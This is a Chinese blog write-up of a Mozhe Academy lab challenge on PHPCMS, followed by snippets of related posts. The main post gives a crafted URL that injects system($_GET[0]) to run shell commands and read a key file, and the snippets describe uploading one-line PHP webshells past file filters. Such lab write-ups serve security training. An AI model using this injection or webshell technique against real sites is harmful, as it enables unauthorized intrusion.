墨者学院-CMS系统漏洞分析溯源(第2题)

最新推荐文章于 2024-05-01 22:30:55 发布
最新推荐文章于 2024-05-01 22:30:55 发布
阅读量513 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39998158/article/details/100539956
版权

CMS系统漏洞分析溯源(第2题)

难易程度:★★★
题目类型:CMS漏洞
使用工具:FireFox浏览器

1.打开靶场,首先看看可不可以访问/robots.txt。
在这里插入图片描述
发现了后台登录地址/admin.php。

2.访问登录地址,用户名和密码都不用自己输入,直接进入!
在这里插入图片描述
3.进入后,构造url:
index.php?0=ls&m=content&c=content&a=public_categorys&type=add&menuid=822;KaTeX parse error: Expected '}', got 'EOF' at end of input: {system(_GET[0])}&pc_hash=vad6K3&from=block
执行命令ls,查看文件。
在url中输入就能直接快速找到key的文件。
在这里插入图片描述
4.把url中的命令ls修改为cat key_278402180914531.php。然后按F12查看源码,就能找到key了。
在这里插入图片描述
在这里插入图片描述

JimWu95
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CMS系统漏洞分析溯源(第2)
weixin_50698958的博客
10-06 359
靶场: https://www.mozhe.cn/bug/detail/ajFqNFRadkk2alNtOVRUVm9MSXA2Zz09bW96aGUmozhe 背景介绍 某单位需新上线了一个系统,安全工程师“墨者”负责对系统的安全检测,确保该系统在上线后不存在安全漏洞。 实训目标 1、了解并熟练使用linux命令; 2、了解PHPCMS的后台地址及其他相关漏洞资料; 3、了解html源码的重要性。 解方向 登录后台后执行linux系统命令,查看web源码。 解思路: 1、打开靶场,首
墨者靶场 中级:CMS系统漏洞分析溯源(第2
qq_43233085的博客
01-17 679
墨者靶场 中级:CMS系统漏洞分析溯源(第2目背景介绍实训目标解方向解步骤 目 背景介绍 某单位需新上线了一个系统,安全工程师“墨者”负责对系统的安全检测,确保该系统在上线后不存在安全漏洞。 实训目标 1、了解并熟练使用linux命令; 2、了解PHPCMS的后台地址及其他相关漏洞资料; 3、了解html源码的重要性。 解方向 登录后台后执行linux系统命令,查看web源码。 解...
2024年网络安全最新Web安全 EmpireCMS漏洞常见漏洞分析及复现_cms代码执行漏洞(1)
2401_84297899的博客
05-01 249
我们知道secure_file_priv这个参数在mysql的配置文件里起到的是能否写入的作用,当secure_file_priv = 为空,则可以写入sql语句到数据库,当secure_file_priv = NULL,则不可以往数据库里写sql语句,当secure_file_priv = /xxx,一个指定目录的时候,就只能往这个指定的目录里面写东西。漏洞原理:url地址经过Request函数处理之后,把url地址中的参数和值部分直接拼接当作a标签的href属性的值和img标签的src标签的值。
墨者 - CMS系统漏洞分析溯源(第2)
吃肉唐僧的博客
07-19 568
上网搜索发现,phpcms框架登录后台的默认入口是/index.php?m=admin 发现后台地址 登录系统,摸索一番 发现木马查杀可以查询系统文件 特征密码输入mozhe,遍历所有文件 发现,并且点击打开访问 ...
墨者学院-编辑器漏洞分析溯源(第2)
a519395243的博客
01-12 747
首先 win10 下可以打开的,用IE 8打开的,其他人说打不开的,可以IE 按F12换版本 找到后台 IP/admin_login.asp 帐号admin  密码 8583213p 点击样式管理下的新增样式 图片类型 cer (IIS6.0平台解析为asp执行),名称随便填,用绝对路径 保存后返回,点击工具后,新增,按钮设置 加插入或修改图片,保存 返回,点击预览,上面操作全在win10 谷歌浏...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1)、PHP代码分析溯源(第2)、PHP逻辑漏洞利用实战(第1)、SQL手工注入漏洞测试(Access数据库)
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
2. **Javaweb-Struts2框架类RCE漏洞**:Struts2框架中的某些版本存在远程代码执行漏洞,通过精心构造的请求,攻击者可以执行任意Java代码。 3. **一句话Webshell后门**:这是一种简单的Web后门,仅用一行代码即可...
墨者学院CMS系统漏洞分析溯源(第2)—3种解法详细介绍
ploto_cs的博客
10-13 745
解法一 解方法: 使用一句话木马进行连接 操作步骤: 1.对网址进行探测 2.发现后台版本文件robots.txt 发现CMS为 PHPCMS v9 后台登录页面为 admin.php 3.浏览 自动填入密码 浏览源码可以发现密码为:I@vH@U$9n8* 也可以将源码中密码的字段名由password改为text 4.查看是否与墨者学院-CMS系统漏洞分析溯源(第7)存在相同的文件上传漏洞 原文回顾:https://blog.csdn.net/ploto_cs/article/details/
超详细--CMS系统漏洞分析溯源(第2)
weixin_44537595的博客
09-29 232
CMS系统漏洞分析溯源(第2) 访问网站 在访问robots.txt或者扫目录都可以,发现有后台 直接访问admin.php 在木马查杀处,可以对应的特征码进行读取问价内容 如下 找到特征码 完成实验
墨者 - WebShell文件上传漏洞分析溯源(第2)
吃肉唐僧的博客
06-30 948
直接上传php文件,发现前端有js校验 核心思路:绕过前端js校验 方法1 试一下,用bp抓包修改后缀绕过,先改文件后缀为jpg 上传成功 直接菜刀无惧链接 方法2 关闭浏览器得js 火狐搜索about:config 搜索java script .enabled,切换为false 上传成功 接下来同样菜刀无惧链接,获得控...
墨者学院 - WebShell文件上传漏洞分析溯源(第2)
多崎巡礼的博客
07-30 855
直接上传php文件 发现前端存在js验证,只能识别图片格式的文件进行上传,这里有两种方法: 第一种是:将一句话木马1.php的后缀名改成.jpg格式的然后进行上传,用burpsuit进行对文件格式改为1.php,上传成功后用菜刀进行链接获取shell,并找到key. 第二种是:  先在浏览器输入about:config(仅限于火狐浏览器),然后搜索java script .enabled将切...
墨者学院-WebShell文件上传漏洞分析溯源(第2)
qq_37850901的博客
09-26 141
首先制作一个简单的图片木马, 然后bp上传,改后缀为php 用菜刀链接这个地址,找到key
在线靶场-墨者-文件上传1星-WebShell文件上传漏洞分析溯源(第2)
weixin_42079912的博客
07-19 411
点击网页,发现可以上传文件,于是上传PHP文件一句话木马上去,提交上传时,出现只能jpg、png等格式才能上传,于是把abc.php文件改为abc.png文件。 打开浏览器代理,运行burp suite,点击上传文件,抓到上传文件的数据,把数据send to Repeater。然后更改文件后缀名,把abc.png改为abc.php。然后点GO,网页反馈回来的信息上传成功路径为uploads/abc...
墨者学院 - WebShell文件上传漏洞分析溯源(第4)
多崎巡礼的博客
07-31 513
1、先随便上传一个图片,发现是php类型的站,再分别上传.jpg、.php文件测试,发现服务器不允许上传php类型文件, 2、一句话木马写入1.php并上传,用burp代理,修改Content-Type”类型为” image/jpeg” 3、点击“Forward”或者在Repeater中的“Go”,得知文件上传后的访问地址 4、菜刀连接木马1.php,找到Key  ...
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值